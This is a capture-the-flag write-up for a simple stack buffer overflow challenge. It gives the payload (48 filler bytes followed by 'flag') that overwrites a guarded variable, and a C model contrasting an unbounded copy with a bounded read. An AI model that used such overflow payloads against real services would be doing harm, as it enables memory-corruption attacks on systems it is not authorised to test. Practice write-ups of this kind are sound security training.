Simple bof
Run `nc thekidofarcrania.com 35235` to observe the interface and IO. \
Run `cat bof.c` to observe the source code.
Observations:
- There is a `secret` variable whose value is `0xdeadbeef`, which matches the red part of the visualization in reverse byte order (the value is stored little-endian on the stack). This indicates the buffer has to be overflowed precisely to reach and modify the red part.
- In the source code, `secret` is compared with `0x67616c66`, which is `galf` in ASCII, so we have to end the buffer overflow with `flag`.
- At the prompt in the interface, enter any ASCII character 48 times, followed by "flag", e.g.,
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflag
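
Why the input ends in `flag` rather than `galf`, and what a bounded read changes, as an added example that is not the challenge's `bof.c`. The `struct frame` layout (48 bytes treated as one region, then the four bytes of `secret`) and all function names are assumptions made for this model.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GAP 48  /* bytes from input start to secret, per the write-up */

/* Constructed model of the frame: buffer and padding, then secret's bytes. */
struct frame {
    unsigned char region[GAP];
    unsigned char secret[4];
};

/* Read 4 bytes the way a little-endian CPU loads a 32-bit int. */
static uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Copy at most `limit` input bytes into a fresh frame; return secret after. */
static uint32_t secret_after(const char *input, size_t limit) {
    struct frame f = { {0}, {0xef, 0xbe, 0xad, 0xde} };  /* 0xdeadbeef, LE */
    size_t n = strlen(input);
    if (n > limit) n = limit;
    memcpy(&f, input, n);
    return le32(f.secret);
}

/* Unbounded read: nothing stops the input at the end of the buffer
   (capped at the model's size only so this demo stays well-defined). */
uint32_t secret_after_unbounded(const char *input) {
    return secret_after(input, sizeof(struct frame));
}

/* Bounded read (fgets-style): at most GAP-1 bytes are accepted. */
uint32_t secret_after_bounded(const char *input) {
    return secret_after(input, GAP - 1);
}

int main(void) {
    char in[GAP + 5];
    memset(in, 'a', GAP);        /* 48 filler bytes */
    memcpy(in + GAP, "flag", 5); /* then "flag" and the terminating NUL */
    printf("unbounded: 0x%08x\n", (unsigned)secret_after_unbounded(in));
    printf("bounded:   0x%08x\n", (unsigned)secret_after_bounded(in));
    return 0;
}
```

With the unbounded read the bytes `f l a g` land on `secret` and load as `0x67616c66`; with the bounded read `secret` stays `0xdeadbeef`.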